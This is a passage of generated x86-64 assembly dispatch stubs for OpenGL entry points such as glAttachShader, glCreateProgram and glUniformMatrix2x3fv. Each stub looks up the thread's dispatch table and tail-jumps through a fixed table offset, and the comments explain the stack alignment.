	.size	GL_PREFIX(MultiTexCoord4fvARB), .-GL_PREFIX(MultiTexCoord4fvARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord4iARB)
	.type GL_PREFIX(MultiTexCoord4iARB), @function
/* glMultiTexCoord4iARB: tail-jump through the dispatch-table slot at
 * byte offset 3232.  The five argument registers %rdi-%r8 are saved
 * around the lookup call (odd push count keeps %rsp 16-byte
 * aligned). */
GL_PREFIX(MultiTexCoord4iARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3232(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3232(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3232(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3232(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord4iARB), .-GL_PREFIX(MultiTexCoord4iARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord4ivARB)
	.type GL_PREFIX(MultiTexCoord4ivARB), @function
/* glMultiTexCoord4ivARB: tail-jump through the dispatch-table slot at
 * byte offset 3240.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord4ivARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3240(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3240(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3240(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3240(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord4ivARB), .-GL_PREFIX(MultiTexCoord4ivARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord4sARB)
	.type GL_PREFIX(MultiTexCoord4sARB), @function
/* glMultiTexCoord4sARB: tail-jump through the dispatch-table slot at
 * byte offset 3248.  The five argument registers %rdi-%r8 are saved
 * around the lookup call (odd push count keeps %rsp 16-byte
 * aligned). */
GL_PREFIX(MultiTexCoord4sARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3248(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3248(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3248(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3248(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord4sARB), .-GL_PREFIX(MultiTexCoord4sARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord4svARB)
	.type GL_PREFIX(MultiTexCoord4svARB), @function
/* glMultiTexCoord4svARB: tail-jump through the dispatch-table slot at
 * byte offset 3256.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord4svARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3256(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3256(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3256(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3256(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord4svARB), .-GL_PREFIX(MultiTexCoord4svARB)
	.p2align	4,,15
	.globl GL_PREFIX(AttachShader)
	.type GL_PREFIX(AttachShader), @function
/* glAttachShader: tail-jump through the dispatch-table slot at byte
 * offset 3264.  %rdi/%rsi are saved around the lookup call; the extra
 * %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(AttachShader):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3264(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3264(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3264(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3264(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(AttachShader), .-GL_PREFIX(AttachShader)
	.p2align	4,,15
	.globl GL_PREFIX(CreateProgram)
	.type GL_PREFIX(CreateProgram), @function
/* glCreateProgram: tail-jump through the dispatch-table slot at byte
 * offset 3272.  No GL arguments; the %rbp push only keeps %rsp
 * 16-byte aligned at the lookup call (%rbp is callee-saved, so the
 * save/restore is harmless). */
GL_PREFIX(CreateProgram):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3272(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	movq	3272(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3272(%rax), %r11
	jmp	*%r11
1:
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	movq	3272(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CreateProgram), .-GL_PREFIX(CreateProgram)
	.p2align	4,,15
	.globl GL_PREFIX(CreateShader)
	.type GL_PREFIX(CreateShader), @function
/* glCreateShader: tail-jump through the dispatch-table slot at byte
 * offset 3280; the lone argument in %rdi is saved around the lookup
 * call. */
GL_PREFIX(CreateShader):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3280(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	3280(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3280(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	3280(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CreateShader), .-GL_PREFIX(CreateShader)
	.p2align	4,,15
	.globl GL_PREFIX(DeleteProgram)
	.type GL_PREFIX(DeleteProgram), @function
/* glDeleteProgram: tail-jump through the dispatch-table slot at byte
 * offset 3288; the lone argument in %rdi is saved around the lookup
 * call. */
GL_PREFIX(DeleteProgram):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3288(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	3288(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3288(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	3288(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(DeleteProgram), .-GL_PREFIX(DeleteProgram)
	.p2align	4,,15
	.globl GL_PREFIX(DeleteShader)
	.type GL_PREFIX(DeleteShader), @function
/* glDeleteShader: tail-jump through the dispatch-table slot at byte
 * offset 3296; the lone argument in %rdi is saved around the lookup
 * call. */
GL_PREFIX(DeleteShader):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3296(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	3296(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3296(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	3296(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(DeleteShader), .-GL_PREFIX(DeleteShader)
	.p2align	4,,15
	.globl GL_PREFIX(DetachShader)
	.type GL_PREFIX(DetachShader), @function
/* glDetachShader: tail-jump through the dispatch-table slot at byte
 * offset 3304.  %rdi/%rsi are saved around the lookup call; the extra
 * %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(DetachShader):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3304(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3304(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3304(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3304(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(DetachShader), .-GL_PREFIX(DetachShader)
	.p2align	4,,15
	.globl GL_PREFIX(GetAttachedShaders)
	.type GL_PREFIX(GetAttachedShaders), @function
/* glGetAttachedShaders: tail-jump through the dispatch-table slot at
 * byte offset 3312.  The four argument registers %rdi-%rcx are saved
 * around the lookup call; %rbp is pushed only to keep %rsp 16-byte
 * aligned. */
GL_PREFIX(GetAttachedShaders):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3312(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3312(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3312(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3312(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetAttachedShaders), .-GL_PREFIX(GetAttachedShaders)
	.p2align	4,,15
	.globl GL_PREFIX(GetProgramInfoLog)
	.type GL_PREFIX(GetProgramInfoLog), @function
/* glGetProgramInfoLog: tail-jump through the dispatch-table slot at
 * byte offset 3320.  The four argument registers %rdi-%rcx are saved
 * around the lookup call; %rbp is pushed only to keep %rsp 16-byte
 * aligned. */
GL_PREFIX(GetProgramInfoLog):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3320(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3320(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3320(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3320(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetProgramInfoLog), .-GL_PREFIX(GetProgramInfoLog)
	.p2align	4,,15
	.globl GL_PREFIX(GetProgramiv)
	.type GL_PREFIX(GetProgramiv), @function
/* glGetProgramiv: tail-jump through the dispatch-table slot at byte
 * offset 3328.  The three argument registers %rdi/%rsi/%rdx are saved
 * around the lookup call (odd push count keeps %rsp 16-byte
 * aligned). */
GL_PREFIX(GetProgramiv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3328(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3328(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3328(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3328(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetProgramiv), .-GL_PREFIX(GetProgramiv)
/*
 * Dispatch stub for glGetShaderInfoLog (generated x86-64 SysV code).
 * Tail-jumps through the dispatch-table pointer at byte offset 3336.
 * The %rbp push is padding: five pushes keep %rsp 16-byte aligned at
 * the lookup call (entry %rsp % 16 == 8).
 */
.p2align 4,,15
.globl GL_PREFIX(GetShaderInfoLog)
.type GL_PREFIX(GetShaderInfoLog), @function
GL_PREFIX(GetShaderInfoLog):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3336(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3336(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3336(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3336(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetShaderInfoLog), .-GL_PREFIX(GetShaderInfoLog)
/*
 * Dispatch stub for glGetShaderiv (generated x86-64 SysV code).
 * Tail-jumps through the dispatch-table pointer at byte offset 3344.
 * Three pushes restore 16-byte stack alignment for the lookup call.
 */
.p2align 4,,15
.globl GL_PREFIX(GetShaderiv)
.type GL_PREFIX(GetShaderiv), @function
GL_PREFIX(GetShaderiv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3344(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3344(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3344(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3344(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetShaderiv), .-GL_PREFIX(GetShaderiv)
/*
 * Dispatch stub for glIsProgram (generated x86-64 SysV code).
 * One integer argument: the single %rdi push also realigns %rsp to
 * 16 bytes for the lookup call.  Table byte offset 3352.
 */
.p2align 4,,15
.globl GL_PREFIX(IsProgram)
.type GL_PREFIX(IsProgram), @function
GL_PREFIX(IsProgram):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3352(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3352(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3352(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3352(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsProgram), .-GL_PREFIX(IsProgram)

/* glIsShader — same 1-arg dispatch pattern, table offset 3360. */
.p2align 4,,15
.globl GL_PREFIX(IsShader)
.type GL_PREFIX(IsShader), @function
GL_PREFIX(IsShader):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3360(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3360(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3360(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3360(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsShader), .-GL_PREFIX(IsShader)
/*
 * Dispatch stub for glStencilFuncSeparate (generated x86-64 SysV code).
 * Four integer args; the %rbp push is padding so the five pushes keep
 * %rsp 16-byte aligned at the lookup call.  Table byte offset 3368.
 */
.p2align 4,,15
.globl GL_PREFIX(StencilFuncSeparate)
.type GL_PREFIX(StencilFuncSeparate), @function
GL_PREFIX(StencilFuncSeparate):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3368(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3368(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3368(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3368(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(StencilFuncSeparate), .-GL_PREFIX(StencilFuncSeparate)

/* glStencilMaskSeparate — 2-arg variant (rdi/rsi + %rbp padding),
 * table offset 3376. */
.p2align 4,,15
.globl GL_PREFIX(StencilMaskSeparate)
.type GL_PREFIX(StencilMaskSeparate), @function
GL_PREFIX(StencilMaskSeparate):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3376(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3376(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3376(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3376(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(StencilMaskSeparate), .-GL_PREFIX(StencilMaskSeparate)

/* glStencilOpSeparate — same 4-arg pattern, table offset 3384. */
.p2align 4,,15
.globl GL_PREFIX(StencilOpSeparate)
.type GL_PREFIX(StencilOpSeparate), @function
GL_PREFIX(StencilOpSeparate):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3384(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3384(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3384(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3384(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(StencilOpSeparate), .-GL_PREFIX(StencilOpSeparate)
/*
 * Dispatch stubs for the six non-square glUniformMatrix*fv entry points
 * (generated x86-64 SysV code).  All share the 4-integer-arg pattern:
 * save rdi/rsi/rdx/rcx plus a padding %rbp push (keeps %rsp 16-byte
 * aligned at the call), look up the thread's dispatch table, then
 * tail-jump through the per-function slot via %r11.
 */
.p2align 4,,15
.globl GL_PREFIX(UniformMatrix2x3fv)
.type GL_PREFIX(UniformMatrix2x3fv), @function
GL_PREFIX(UniformMatrix2x3fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3392(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3392(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3392(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3392(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UniformMatrix2x3fv), .-GL_PREFIX(UniformMatrix2x3fv)

/* glUniformMatrix2x4fv — table offset 3400. */
.p2align 4,,15
.globl GL_PREFIX(UniformMatrix2x4fv)
.type GL_PREFIX(UniformMatrix2x4fv), @function
GL_PREFIX(UniformMatrix2x4fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3400(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3400(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3400(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3400(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UniformMatrix2x4fv), .-GL_PREFIX(UniformMatrix2x4fv)

/* glUniformMatrix3x2fv — table offset 3408. */
.p2align 4,,15
.globl GL_PREFIX(UniformMatrix3x2fv)
.type GL_PREFIX(UniformMatrix3x2fv), @function
GL_PREFIX(UniformMatrix3x2fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3408(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3408(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3408(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3408(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UniformMatrix3x2fv), .-GL_PREFIX(UniformMatrix3x2fv)

/* glUniformMatrix3x4fv — table offset 3416. */
.p2align 4,,15
.globl GL_PREFIX(UniformMatrix3x4fv)
.type GL_PREFIX(UniformMatrix3x4fv), @function
GL_PREFIX(UniformMatrix3x4fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3416(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3416(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3416(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3416(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UniformMatrix3x4fv), .-GL_PREFIX(UniformMatrix3x4fv)

/* glUniformMatrix4x2fv — table offset 3424. */
.p2align 4,,15
.globl GL_PREFIX(UniformMatrix4x2fv)
.type GL_PREFIX(UniformMatrix4x2fv), @function
GL_PREFIX(UniformMatrix4x2fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3424(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3424(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3424(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3424(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UniformMatrix4x2fv), .-GL_PREFIX(UniformMatrix4x2fv)

/* glUniformMatrix4x3fv — table offset 3432. */
.p2align 4,,15
.globl GL_PREFIX(UniformMatrix4x3fv)
.type GL_PREFIX(UniformMatrix4x3fv), @function
GL_PREFIX(UniformMatrix4x3fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3432(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3432(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3432(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3432(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(UniformMatrix4x3fv), .-GL_PREFIX(UniformMatrix4x3fv)
/*
 * Dispatch stubs for the four ARB transpose-matrix entry points
 * (generated x86-64 SysV code).  Each takes a single pointer arg in
 * %rdi; the one push also realigns %rsp to 16 bytes for the lookup
 * call before tail-jumping through the per-function table slot.
 */
.p2align 4,,15
.globl GL_PREFIX(LoadTransposeMatrixdARB)
.type GL_PREFIX(LoadTransposeMatrixdARB), @function
GL_PREFIX(LoadTransposeMatrixdARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3440(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
